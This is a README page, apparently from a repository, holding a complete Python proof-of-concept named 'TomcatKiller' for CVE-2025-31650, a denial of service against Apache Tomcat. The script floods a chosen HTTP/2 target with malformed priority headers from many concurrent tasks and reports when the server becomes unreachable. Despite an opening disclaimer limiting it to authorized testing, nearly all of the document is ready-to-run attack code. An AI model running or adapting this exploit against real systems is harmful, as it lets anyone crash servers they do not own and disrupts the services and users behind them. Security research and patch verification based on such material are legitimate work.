README.md
Rendering markdown...
# TomcatKiller - CVE-2025-31650 PoC
#
# Author: Tunahan Tekeoğlu (@tunahantekeoglu)
# Purpose: Educational use and authorized security testing only
#
# Description:
# This script targets a known memory exhaustion vulnerability in Apache Tomcat
# (CVE-2025-31650) by sending malformed HTTP/2 priority headers.
#
# ⚠️ Disclaimer:
# This proof-of-concept is provided for educational purposes and internal security
# assessments. Do NOT use this script against systems without explicit permission.
import httpx
import asyncio
import random
import urllib.parse
import sys
import socket
import argparse
from colorama import init, Fore, Style
init()
class TomcatKiller:
def __init__(self):
self.success_count = 0
self.error_count = 0
self.invalid_priorities = [
"u=-1, q=2", "u=4294967295, q=-1", "u=-2147483648, q=1.5",
"u=0, q=invalid", "u=1/0, q=NaN", "u=1, q=2, invalid=param", "",
"u=1, q=1, u=2", "u=99999999999999999999, q=0",
"u=-99999999999999999999, q=0", "u=, q=", "u=1, q=1, malformed",
"u=1, q=, invalid", "u=-1, q=4294967295", "u=invalid, q=1",
"u=1, q=1, extra=\ud83d\ude08", "u=1, q=1; malformed",
"u=1, q=1, =invalid", "u=0, q=0, stream=invalid",
"u=1, q=1, priority=recursive", "u=1, q=1, %invalid%",
"u=0, q=0, null=0",
]
async def validate_url(self, url):
try:
parsed_url = urllib.parse.urlparse(url)
if not parsed_url.scheme or not parsed_url.hostname:
raise ValueError("Invalid URL format. Use http:// or https://")
host = parsed_url.hostname
port = parsed_url.port if parsed_url.port else (443 if parsed_url.scheme == 'https' else 80)
return host, port
except Exception:
print(f"{Fore.RED}Error: Invalid URL. Use http:// or https:// format.{Style.RESET_ALL}")
sys.exit(1)
async def check_http2_support(self, host, port):
async with httpx.AsyncClient(http2=True, verify=False, timeout=5, limits=httpx.Limits(max_connections=1000)) as client:
try:
response = await client.get(f"https://{host}:{port}/", headers={"user-agent": "TomcatKiller"})
server_header = response.headers.get("server", "")
print(f"{Fore.CYAN}[i] Server Header: {server_header}{Style.RESET_ALL}")
if "tomcat" in server_header.lower():
print(f"{Fore.GREEN}[+] Apache Tomcat detected.{Style.RESET_ALL}")
else:
print(f"{Fore.YELLOW}[!] Tomcat not clearly visible in Server header. Manual verification recommended.{Style.RESET_ALL}")
if response.http_version == "HTTP/2":
print(f"{Fore.GREEN}[+] HTTP/2 supported. Target may be vulnerable.{Style.RESET_ALL}")
return True
else:
print(f"{Fore.RED}[-] HTTP/2 not supported. Exploit will not work.{Style.RESET_ALL}")
return False
except Exception:
print(f"{Fore.RED}[-] Failed to connect to {host}:{port}.{Style.RESET_ALL}")
return False
async def send_invalid_priority_request(self, host, port, num_requests, task_id):
async with httpx.AsyncClient(http2=True, verify=False, timeout=0.3, limits=httpx.Limits(max_connections=1000)) as client:
url = f"https://{host}:{port}/"
for _ in range(num_requests):
headers = {
"priority": random.choice(self.invalid_priorities),
"user-agent": f"TomcatKiller-{task_id}-{random.randint(1, 1000000)}",
"cache-control": "no-cache",
"accept": f"*/*; q={random.random()}"
}
try:
await client.get(url, headers=headers)
self.success_count += 1
except Exception:
self.error_count += 1
async def monitor_server(self, host, port):
while True:
try:
with socket.create_connection((host, port), timeout=2):
print(f"{Fore.YELLOW}Target {host}:{port} is still reachable.{Style.RESET_ALL}")
except Exception:
print(f"{Fore.RED}Target {host}:{port} unreachable or crashed!{Style.RESET_ALL}")
break
await asyncio.sleep(2)
async def run_attack(self, host, port, num_tasks, requests_per_task):
print(f"{Fore.GREEN}Launching exploit against {host}:{port}...{Style.RESET_ALL}")
print(f"Tasks: {num_tasks}, Requests per task: {requests_per_task}")
monitor_task = asyncio.create_task(self.monitor_server(host, port))
tasks = [self.send_invalid_priority_request(host, port, requests_per_task, i) for i in range(num_tasks)]
await asyncio.gather(*tasks)
monitor_task.cancel()
total_requests = num_tasks * requests_per_task
success_rate = (self.success_count / total_requests * 100) if total_requests > 0 else 0
print(f"\n{Fore.MAGENTA}===== Attack Summary ====={Style.RESET_ALL}")
print(f"Target: {host}:{port}")
print(f"Total Requests: {total_requests}")
print(f"Successful: {self.success_count}, Failed: {self.error_count}")
print(f"Success Rate: {success_rate:.2f}%")
print(f"{Fore.MAGENTA}========================={Style.RESET_ALL}")
async def main():
parser = argparse.ArgumentParser(description="PoC for CVE-2025-31650 - Apache Tomcat HTTP/2 DoS")
parser.add_argument("--target", required=True, help="Target URL (e.g., https://example.com:8443)")
parser.add_argument("--check-only", action="store_true", help="Only check HTTP/2 and Server header")
parser.add_argument("--exploit", action="store_true", help="Run the actual exploit")
parser.add_argument("--tasks", type=int, default=50, help="Number of async tasks (default: 50)")
parser.add_argument("--requests", type=int, default=5000, help="Requests per task (default: 5000)")
args = parser.parse_args()
tk = TomcatKiller()
host, port = await tk.validate_url(args.target)
if not await tk.check_http2_support(host, port):
sys.exit(1)
if args.check_only:
sys.exit(0)
if args.exploit:
await tk.run_attack(host, port, args.tasks, args.requests)
else:
print(f"{Fore.YELLOW}[-] No action specified. Use --check-only or --exploit{Style.RESET_ALL}")
parser.print_help()
sys.exit(1)
if __name__ == "__main__":
try:
asyncio.run(main())
print(f"{Fore.GREEN}Done.{Style.RESET_ALL}")
except KeyboardInterrupt:
print(f"{Fore.YELLOW}Interrupted by user.{Style.RESET_ALL}")
sys.exit(0)
except Exception as e:
print(f"{Fore.RED}Unexpected error: {e}{Style.RESET_ALL}")
sys.exit(1)